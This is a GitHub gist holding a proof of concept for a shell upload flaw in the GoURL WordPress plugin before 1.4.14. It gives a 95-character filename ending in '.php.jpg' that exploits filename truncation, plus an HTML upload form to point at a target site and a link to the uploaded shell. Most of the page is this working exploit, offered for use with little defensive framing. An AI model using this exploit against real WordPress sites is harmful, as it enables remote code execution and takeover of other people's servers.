Skip to content

Instantly share code, notes, and snippets.

What would you like to do? before 1.4.14 Shell upload vulnerability
GoURL Unrestricted Upload Vulnerablity POC by @pouyadarabi
Vulnerable Fucntion:
After checking file extention substring was used for file name to select first 95 letter line #5655
So enter file name like "123456789a123456789b123456789c123456789d123456789e123456789f123456789g123456789h123456789i1.php.jpg"
will upload a file with .php extention in website :)
Replace with target wordpress website
Fill id param in form action to any active download product
<form action="" method="POST" enctype="multipart/form-data">
<input type="file" name="gourlimage2" />
<input type="submit"/>
<a href="">Shell link</a>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.